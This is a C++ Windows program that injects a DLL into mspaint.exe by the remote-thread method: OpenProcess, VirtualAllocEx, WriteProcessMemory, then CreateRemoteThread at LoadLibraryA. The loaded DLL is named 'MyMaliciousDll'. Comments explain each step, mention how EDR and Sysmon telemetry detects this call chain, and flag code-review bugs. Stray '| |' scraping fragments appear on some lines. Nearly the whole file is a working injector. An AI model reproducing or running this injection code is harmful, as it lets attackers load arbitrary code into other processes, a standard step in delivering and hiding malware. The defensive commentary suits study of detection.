#include <iostream> | |
#include <windows.h> | |
#include "Processthreadsapi.h" | |
#include "Libloaderapi.h" | |
#include <tlhelp32.h> | |
#include "winternl.h" | |
using namespace std; | |
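// Report a fatal error on stderr and hand back the process exit status 1, so a
// caller can write `return err("...")` and terminate in one statement.
//
// [[nodiscard]] is deliberate: the returned status IS the error handling. A bare
// `err("...");` statement prints the message but lets execution fall through to
// the next step as if nothing had failed, and the compiler should flag that.
//
// @param msg  NUL-terminated message; a nullptr is printed as "(null)" instead
//             of being streamed (streaming a null const char* is undefined).
// @return     always 1, the conventional non-zero exit status.
[[nodiscard]] int err(const char* msg) {
    std::cerr << (msg != nullptr ? msg : "(null)") << std::endl;
    return 1;
}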
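// Return the PID of the first running process whose executable file name equals
// process_name (exact, case-sensitive wcscmp against PROCESSENTRY32::szExeFile),
// or 0 when no such process exists, process_name is nullptr, or the process
// snapshot could not be taken.
//
// Two correctness points versus the naive Toolhelp loop:
//  * CreateToolhelp32Snapshot signals failure with INVALID_HANDLE_VALUE, not
//    NULL, so that is the value that must be tested before the handle is used.
//  * Process32First already yields the first entry; iterating with
//    Process32Next alone would silently skip it, so every entry is compared.
//
// @param process_name  wide, NUL-terminated executable name, e.g. L"foo.exe".
// @return              the matching th32ProcessID, or 0.
int find_process(const wchar_t* process_name) {
    if (process_name == nullptr) {
        return 0;
    }

    HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (snapshot == INVALID_HANDLE_VALUE) {
        return 0;
    }

    // dwSize must be set before the first Process32First call or it fails.
    PROCESSENTRY32 entry{};
    entry.dwSize = sizeof(PROCESSENTRY32);

    int pid = 0;
    for (BOOL more = Process32First(snapshot, &entry); more;
         more = Process32Next(snapshot, &entry)) {
        if (wcscmp(entry.szExeFile, process_name) == 0) {
            pid = static_cast<int>(entry.th32ProcessID);
            break;
        }
    }

    // Single exit path so the snapshot handle is always released.
    CloseHandle(snapshot);
    return pid;
}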
#define INJECTION_TARGET L"mspaint.exe" | |
#define DLL_TO_INJECT "C:\\Users\\Christophe\\source\\repos\\MyMaliciousDll\\x64\\Release\\MYMALICIOUSDLL.DLL" | |
int main()
{
    // Textbook remote-thread DLL injection: open the target, place a DLL path in
    // its address space, then start a thread in it whose entry point is
    // LoadLibraryA with that path as the argument. From a defender's point of
    // view this exact call chain (OpenProcess requesting PROCESS_VM_WRITE and
    // PROCESS_CREATE_THREAD -> VirtualAllocEx -> WriteProcessMemory ->
    // CreateRemoteThread) is what process-injection telemetry in EDR and
    // Sysmon-style tooling typically keys on; the cross-process thread creation
    // in particular is the most commonly monitored event.

    // Step 1: Get a handle on the target process.
    cout << "Getting handle on target process" << endl;
    // Access rights needed for the steps below: write memory, operate on it,
    // and create a thread in the target.
    int desiredAccess = PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ;
    // NOTE(review): find_process() returns 0 when the target is not running, and
    // that 0 is passed straight to OpenProcess as the PID; the failure is only
    // caught indirectly by the NULL handle check below.
    HANDLE hTargetProcess = OpenProcess(desiredAccess, true, find_process(INJECTION_TARGET));
    if (hTargetProcess == NULL)
        return err("Unable to get a handle on target process");

    // Step 2: Write the DLL path into the target process's memory.
    // NOTE: the DLL must be 64-bit (it is loaded by a 64-bit target).
    // Step 2.1: Allocate a new read/write region in the target.
    LPVOID targetDataPage = VirtualAllocEx(hTargetProcess, NULL, strlen(DLL_TO_INJECT), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    // NOTE(review): err()'s return value is dropped here, so on allocation
    // failure execution continues with targetDataPage == NULL; every other error
    // path in this function returns.
    if (targetDataPage == NULL)
        err("Unable to allocate memory in target process");
    // Step 2.2: Write the DLL path to the allocated memory.
    if (0 == WriteProcessMemory(hTargetProcess, targetDataPage, DLL_TO_INJECT, strlen(DLL_TO_INJECT), NULL))
        return err("Unable to write DLL path to target process memory");

    // Step 3: Resolve LoadLibraryA in this process. The address is then used as
    // a thread start routine in the target, which only works on the assumption
    // that kernel32.dll is mapped at the same base address in both processes.
    cout << "Retrieving LoadLibraryA address" << endl;
    HMODULE hModule = GetModuleHandleA("kernel32.dll");
    FARPROC load_library_addr = GetProcAddress(hModule, "LoadLibraryA");
    cout << "LoadLibraryA @ " << load_library_addr << endl;

    // Step 4: Create a remote thread at that address with the written DLL path
    // as its single parameter.
    DWORD threadId = 0;
    HANDLE hThread = CreateRemoteThread(
        hTargetProcess,
        NULL,
        0,
        (LPTHREAD_START_ROUTINE) load_library_addr,  // C-style cast; static_cast would be the idiomatic form
        targetDataPage,
        0,
        &threadId
    );
    if (hThread == NULL) {
        cerr << "Unable to create remote thread: error " << GetLastError() << endl;
        return 1;
    }

    // Step 5: Done. hThread and hTargetProcess are never closed; the process
    // exits immediately so the OS reclaims them, but they are leaked handles.
    return 0;
}